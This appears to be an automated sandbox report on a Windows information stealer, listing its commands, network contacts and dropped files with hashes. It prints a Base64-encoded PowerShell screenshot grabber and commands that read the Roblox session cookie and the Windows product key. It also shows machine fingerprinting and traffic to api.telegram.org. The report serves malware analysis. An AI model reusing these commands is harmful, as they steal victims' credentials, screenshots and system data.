powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8211.tmp" "c:\Users\Admin\AppData\Local\Temp\n4jwrekj\CSC46F09258AF984D52A38A9DE811F0B549.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI43122\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI43122\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI43122\base_library.zip

MD5 8dad91add129dca41dd17a332a64d593
SHA1 70a4ec5a17ed63caf2407bd76dc116aca7765c0d
SHA256 8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783
SHA512 2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI43122\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_sqlite3.pyd

MD5 29464d52ba96bb11dbdccbb7d1e067b4
SHA1 d6a288e68f54fb3f3b38769f271bf885fd30cbf6
SHA256 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe
SHA512 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

C:\Users\Admin\AppData\Local\Temp\_MEI43122\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_ssl.pyd

MD5 5b9b3f978d07e5a9d701f832463fc29d
SHA1 0fcd7342772ad0797c9cb891bf17e6a10c2b155b
SHA256 d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa
SHA512 e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_queue.pyd

MD5 6e0cb85dc94e351474d7625f63e49b22
SHA1 66737402f76862eb2278e822b94e0d12dcb063c5
SHA256 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b
SHA512 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI43122\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI43122\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI43122\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI43122\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

C:\Users\Admin\AppData\Local\Temp\_MEI43122\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

memory/3168-53-0x00007FFCB7CC3000-0x00007FFCB7CC5000-memory.dmp

memory/3168-54-0x000001F27A550000-0x000001F27A572000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdafxj0r.neo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3168-63-0x00007FFCB7CC0000-0x00007FFCB8782000-memory.dmp

memory/3168-64-0x00007FFCB7CC0000-0x00007FFCB8782000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 408641808e457ab6e23d62e59b767753
SHA1 4205cfa0dfdfee6be08e8c0041d951dcec1d3946
SHA256 3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258
SHA512 e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

memory/3168-178-0x00007FFCB7CC0000-0x00007FFCB8782000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

\??\c:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.cmdline

MD5 496d3de9ec6951172801af485c7321ba
SHA1 bd257599e00cb5a7a55077386eb2bb7a5fbca983
SHA256 7cb8a55e22f140318ff4c6bb271f3521ec7e2f4d5af9c9ba47e4ad0c5b1fd367
SHA512 e3198cfef2a54081732b0af0b8cee2ff1f74c335951428d92f87cddc527c6dd94a7bc5504700f10181b684081d8f91cc7181e1de4a8f2e92269dcbdf73e56dec

\??\c:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\n4jwrekj\CSC46F09258AF984D52A38A9DE811F0B549.TMP

MD5 8e960a2626bd95753fe0e6575f2be01d
SHA1 18327e3767dc4bea16aa467ceab590f465ee98ca
SHA256 66468d11f78e22ce2cb3b73272bbce1ba47327cb96165285fa31fac9eb423f59
SHA512 bb12e7f7959c9d077ea2b9b74d3482aaa7b085a6ea411b7b82c6dc8b5cf6ab2350db1eec6df81f60f7d6691bb239b6fc44cb228ecbfa0786696acc90470175ce

C:\Users\Admin\AppData\Local\Temp\RES8211.tmp

MD5 f11a8c23884e9bbe40b6d92f65edf856
SHA1 0771df87a46541db5552e908c560d10375acda53
SHA256 1e66780326d9635b4baff5bc2b0d33ff93c72419a5c723142e6b4d9ec4ed4def
SHA512 cb6016d9fb7a1cc46f2aa15de42066280f47fa12cb0cad4f161aa958708889c9f9df58af25ec37bf2e58bb5ead771a76a098b0e701f5fd7e4a37a5af5762b123

C:\Users\Admin\AppData\Local\Temp\n4jwrekj\n4jwrekj.dll

MD5 b68901b5eb818b79cc10d8f12da57299
SHA1 344fbe710bb94e1fff3cf74c87b21248aa7fe063
SHA256 fa6da47218221210a5a7854d6641db54e920b0bfc78329809f4e700a5ee8650c
SHA512 9c88a7d42929d797716e981d414ee91f371a162e10792c17d819c42bb8dcd8681b430f432c560ccfbc919cc2cfc48c938742b3e166e754d7de24dbf23d70cbda

memory/4580-199-0x00000170A3A20000-0x00000170A3A28000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f5b98ce0ad06ebb5c2ec11ffec5fbb1
SHA1 82e1ea9056feba9ddcc85791cd3994f8607ada84
SHA256 2cda8a09bad4890dd11d84c6c38c71f07130bfce58ce09f308452e9a650bad93
SHA512 bf0a7c56e2d3edc7169772008576edab790033fdab0678dda8b952c85ceafbdcaf38a208f25b1a2a05c3444de0f98fec923868d4bf1aa4201dda0f6b5b3128e6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7332074ae2b01262736b6fbd9e100dac
SHA1 22f992165065107cc9417fa4117240d84414a13c
SHA256 baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa
SHA512 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Display (1).png

MD5 a5a57e441f1b8c055581f1c210a9adb3
SHA1 2d79f933b86f4f83b4b2d7cedd4c0c9469fd9e14
SHA256 50179c68a4d3b33858f6dedc2fe4816278363a42e4bbe6a4ca46a940ecb20032
SHA512 269c56829975f240f93e69fe5874cc9c102a3f3cd97015208b627bdac1f462063bb8ca874b2dd043ff2b30384d10fd0fd794165687cc0bb98f235fd91456cc85

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Desktop\GroupDeny.docx

MD5 3d314a61604a97ccad6da53da36cc080
SHA1 a5ff105b5af0ce85e65fc3bf172021ebd149a449
SHA256 094075a876899c6ad4cf8306156cdec3cb094a16dbbefcee0e8454c9cd16fe4a
SHA512 86720c55638c10ea5f098ec4559250c36839563e423b6bbadeed645bd175905894a0315449679e457fe9ed75fad4411b5365d73bfb16ed58b22cad18339e6bc6

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Desktop\SkipBackup.php

MD5 a6d08ff32ea950e1ff0ef5e50d1b3ac3
SHA1 aca35494290faf595964132d035ac9fc61c44ed8
SHA256 38e57803e2536da7774743b26a3494f95aeb31a8eed1c31ad302cdb6fe6f806c
SHA512 19b2ee3fc0f650708d3aed562d710701af53a47e68fa19dd35a35e9916f0c5a406342c2d2ae82e8015f9baf82d45284d251962b11837dc3138ffe921d2ffbebf

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Desktop\MergeReset.csv

MD5 9266f60565000b2ec0c121588dd1069c
SHA1 657b423ede30e41fd9b7c410e7062a5aa64d2f01
SHA256 e9e7884af572bd1ca0832ae9e45268a3647d2bd842c5d4d104d8a05f65571ed0
SHA512 b1f6a14e4a2a4a3956f0d6961102fdacd5168712b6c4abe549680586f1bfedaa513a4e1452ee76b4f1e5aea19180f36066080324463e1f5867d2d501c681c90e

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\AssertSelect.xls

MD5 ea646902540ab16fe1d837b58c1def0d
SHA1 97ca9ed0a5736d2aaf6c4ed68fa371d208d49128
SHA256 bd9637cd2d4eb831e3c956ca6d956315d6eae92185aac877d89b98a78b92005f
SHA512 73bb9952d75356f79e55bbfb17bf65edd0c9569fc86e88f867a63cd4a673d3c77d00416279d2aa1063356bee2554d12595e5ca58ed974ed63071b8cfafc26bbd

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\SendLimit.txt

MD5 07452615e511356bf0ef606ae94e3fb1
SHA1 7f965d44095ccc16655b3c0514f01134b26266e4
SHA256 3af004295b818df7a3d22bf4af527a1edff939f29e8e8209dba16ba6093d3412
SHA512 3ce14c82ffdc4e916eaeadd304cd4c53a7cb79919306153b2ef3ca0f4b8682501f1bf96a76c13c866f78ab03cc10c34889ea1f1f934a848020ca8a09fad6aac7

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\ResetPublish.txt

MD5 02781d2931f2801f101fd10f926cbfdb
SHA1 931bc83b2831242b5138e6b411138d6be33d8a70
SHA256 e5dd4a9c12c82023219f873bb8f9ca84e4fbf0fd00c5b90f452299992592b8b3
SHA512 fba2679d5394c7297fe1b0222518443ca24567d34dcb4ce072b804d29aa73a1818815267b746d9a8326d333aed73ae09f41ad7e337d265aa02cbfbbc2887b249

C:\Users\Admin\AppData\Local\Temp\Β β€€β€Šβ€†β€Žβ€‰β€Œβ€‰Β β€Ž\Common Files\Documents\UnpublishProtect.xls

MD5 464874892482f1100a9496968e860ca4
SHA1 40f278b97d6051a0e9cd7da06b8c4fb8f5c49889
SHA256 40359e42936ff25e853caf067713bb45f22592558462308fb634f7a7170956d1
